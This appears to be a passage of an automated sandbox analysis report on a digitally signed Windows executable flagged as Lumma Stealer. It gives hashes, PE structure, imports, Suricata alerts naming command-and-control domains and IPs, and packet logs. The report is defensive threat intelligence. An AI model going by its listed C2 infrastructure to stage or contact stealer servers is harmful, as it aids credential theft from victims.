                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                IGAnbXyZVx.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                N65c8rwdal.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                FA_41_09_2024_.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 104.21.8.235

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                No created / dropped files found

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                Entropy (8bit):4.77637947624399
                                                                                                                                                                TrID:
                                                                                                                                                                • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                File name:7wN7BF7WfX.exe
                                                                                                                                                                File size:14'180'600 bytes
                                                                                                                                                                MD5:a0339542baa3175d220c11a7fe75d0fc
                                                                                                                                                                SHA1:ea0462e2d20878937b02d9bc99c3fc6a05150fc9
                                                                                                                                                                SHA256:cef24501f390557eb4dd01b93d2fa273d3a0170805deaade53bc832b63adcd74
                                                                                                                                                                SHA512:f0e1d12c03f4367c96f146ae43812f51d5a15dca669eec1790fcb84c9d2c74a283172b2a3e8517d30fe6c5d6d5cfd5034b79055357c91c4db8a69f8d17563daf
                                                                                                                                                                SSDEEP:98304:BeExFaDjrP2XqaE5e3x//1fQ3LETdr/uQYRC:PUDjrP2XqHo3F/l8QYRC
                                                                                                                                                                TLSH:85E62843E8A585E8C199E13485268212BB75BC88CB3077E73F60F7646F36BD0AE78754
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..F..4...r.............@.....................................p....`... ............................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:d18eb3ababb3c403

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x1400014c0
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:true
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                TLS Callbacks:0x40456400, 0x1, 0x404563d0, 0x1, 0x40459e70, 0x1
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:6
                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                File Version Major:6
                                                                                                                                                                File Version Minor:1
                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                Import Hash:c595f1660e1a3c84f4d9b0761d23cd7a

                                                                                                                                                                Authenticode Signature

                                                                                                                                                                Signature Valid:true
                                                                                                                                                                Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                                Error Number:0
                                                                                                                                                                Not Before, Not After
                                                                                                                                                                • 09/09/2024 11:06:13 09/09/2025 11:06:12
                                                                                                                                                                Subject Chain
                                                                                                                                                                • CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                                                                                                                Version:3
                                                                                                                                                                Thumbprint MD5:62A1343435FC5131E11FA8C871BB3A1B
                                                                                                                                                                Thumbprint SHA-1:A3AFF46C5F8E2A1F750C570698B864E75553E61F
                                                                                                                                                                Thumbprint SHA-256:87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
                                                                                                                                                                Serial:332576FE101609502C23F70055B4A3BE

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, dword ptr [00D52035h]
                                                                                                                                                                mov dword ptr [eax], 00000001h
                                                                                                                                                                call 00007F8BB887B4DFh
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop dword ptr [eax]
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, dword ptr [00D52015h]
                                                                                                                                                                mov dword ptr [eax], 00000000h
                                                                                                                                                                call 00007F8BB887B4BFh
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop dword ptr [eax]
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                call 00007F8BB8CDB4FCh
                                                                                                                                                                dec eax
                                                                                                                                                                test eax, eax
                                                                                                                                                                sete al
                                                                                                                                                                movzx eax, al
                                                                                                                                                                neg eax
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                lea ecx, dword ptr [00000009h]
                                                                                                                                                                jmp 00007F8BB887B7F9h
                                                                                                                                                                nop dword ptr [eax+00h]
                                                                                                                                                                ret
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                jmp dword ptr [eax]
                                                                                                                                                                inc edi
                                                                                                                                                                outsd
                                                                                                                                                                and byte ptr [edx+75h], ah
                                                                                                                                                                imul ebp, dword ptr [esp+20h], 203A4449h
                                                                                                                                                                and dh, byte ptr [edi+37h]
                                                                                                                                                                xor dword ptr [edi+ecx*2], esi
                                                                                                                                                                push eax
                                                                                                                                                                imul esi, dword ptr [784C6F7Ah], 45h
                                                                                                                                                                jne 00007F8BB887B895h
                                                                                                                                                                insb
                                                                                                                                                                je 00007F8BB887B898h
                                                                                                                                                                push 56322F72h
                                                                                                                                                                push edi
                                                                                                                                                                inc edi
                                                                                                                                                                jp 00007F8BB887B852h
                                                                                                                                                                xor eax, 6F4A4E32h
                                                                                                                                                                inc ebx
                                                                                                                                                                jo 00007F8BB887B869h
                                                                                                                                                                jne 00007F8BB887B874h
                                                                                                                                                                bound esi, dword ptr [ebx+66h]
                                                                                                                                                                jnbe 00007F8BB887B851h
                                                                                                                                                                insb
                                                                                                                                                                inc edx
                                                                                                                                                                popad
                                                                                                                                                                dec eax
                                                                                                                                                                push bp
                                                                                                                                                                inc ebp
                                                                                                                                                                arpl word ptr [ebx+46h], cx
                                                                                                                                                                jo 00007F8BB887B87Ah
                                                                                                                                                                jns 00007F8BB887B885h

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xe020000x4e.edata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xe030000x1458.idata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xe070000x3e80.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0xd540000x14c7c.pdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xd838000x28f8.bss
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0b0000x15b00.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xd52e600x28.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xe034940x458.idata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x4609a00x460a00ba861b481b9609911612b1ef541c7566unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0x4620000x547500x54800d3829d6312816be846e00993c2209ab1False0.3586642474112426dBase III DBT, version number 0, next free block index 10, 1st item "55.5\011h1:KKUZBfBoyqy5d3swXyiC7Q76ic40rYcbqH7qjh59kzU="4.910706095138231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .rdata0x4b70000x89ccb00x89ce00c18d3472e4803031af3fba26fbfe5009unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                .pdata0xd540000x14c7c0x14e000e3c1d9836b2bdf88fe1fdb18685939fFalse0.40686985404191617data5.566619751987573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                .xdata0xd690000xc600xe00272d71aa4a366a09f33d5843d57e0a27False0.259765625data4.002227196334585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                .bss0xd6a0000x971600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .edata0xe020000x4e0x200be770f490d8f8986e74cd7cbe90556b5False0.1328125data0.8426867641107897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                .idata0xe030000x14580x160001a7bf8d527716e2f5790971560f6f7aFalse0.2975852272727273data4.326643894509159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .CRT0xe050000x700x200b2b2760e1d81e0c05ce4553a2ab31231False0.083984375data0.4565349337112152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .tls0xe060000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .rsrc0xe070000x3e800x4000cc49512012bd488faf4eec27a7af70bbFalse0.8238525390625data7.5225819374824505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .reloc0xe0b0000x15b000x15c008e95893b0e932b1f6f7fff6014096443False0.24838362068965517data5.438766212570609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_ICON0xe071b00x3191PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.953897076207739
                                                                                                                                                                RT_GROUP_ICON0xe0a3440x14data1.05
                                                                                                                                                                RT_VERSION0xe0a3580x4fcdata0.2829153605015674
                                                                                                                                                                RT_MANIFEST0xe0a8540x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                KERNEL32.dllAddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                                                                                                                                                                msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen

                                                                                                                                                                Exports

                                                                                                                                                                NameOrdinalAddress
                                                                                                                                                                _cgo_dummy_export10x140e00390

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-10-02T15:01:25.640023+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749709104.21.8.235443TCP
                                                                                                                                                                2024-10-02T15:01:25.640023+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749709104.21.8.235443TCP
                                                                                                                                                                2024-10-02T15:01:25.654109+02002056078ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)1192.168.2.7582731.1.1.153UDP
                                                                                                                                                                2024-10-02T15:01:25.664379+02002056076ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (defenddsouneuw .shop)1192.168.2.7496181.1.1.153UDP
                                                                                                                                                                2024-10-02T15:01:25.674205+02002056074ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deallyharvenw .shop)1192.168.2.7557221.1.1.153UDP
                                                                                                                                                                2024-10-02T15:01:25.684435+02002056072ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (priooozekw .shop)1192.168.2.7515501.1.1.153UDP
                                                                                                                                                                2024-10-02T15:01:25.694641+02002056070ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pumpkinkwquo .shop)1192.168.2.7499541.1.1.153UDP
                                                                                                                                                                2024-10-02T15:01:25.706664+02002056068ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abortinoiwiam .shop)1192.168.2.7572131.1.1.153UDP
                                                                                                                                                                2024-10-02T15:01:25.718925+02002056064ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surroundeocw .shop)1192.168.2.7648011.1.1.153UDP
                                                                                                                                                                2024-10-02T15:01:25.729661+02002056066ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covvercilverow .shop)1192.168.2.7567871.1.1.153UDP
                                                                                                                                                                2024-10-02T15:01:28.195246+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749711172.67.209.193443TCP
                                                                                                                                                                2024-10-02T15:01:28.195246+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749711172.67.209.193443TCP

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Oct 2, 2024 15:01:24.643347025 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:24.643385887 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:24.643451929 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:24.647079945 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:24.647093058 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.129211903 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.129276991 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:25.132735968 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:25.132742882 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.132947922 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.178786993 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:25.185297012 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:25.185319901 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:25.185375929 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.639981985 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.640052080 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.640126944 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:25.641716957 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:25.641732931 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.641746998 CEST49709443192.168.2.7104.21.8.235
                                                                                                                                                                Oct 2, 2024 15:01:25.641752005 CEST44349709104.21.8.235192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.749840975 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:25.749891996 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:25.749963999 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:25.750313044 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:25.750339985 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.391243935 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.391413927 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:26.393107891 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:26.393120050 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.393364906 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.398366928 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:26.443399906 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.901376009 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.901396990 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.901410103 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.901990891 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:26.901990891 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:26.902028084 CEST44349710104.102.49.254192.168.2.7
                                                                                                                                                                Oct 2, 2024 15:01:26.902194977 CEST49710443192.168.2.7104.102.49.254
                                                                                                                                                                Oct 2, 2024 15:01:27.002275944 CEST44349710104.102.49.254192.168.2.7
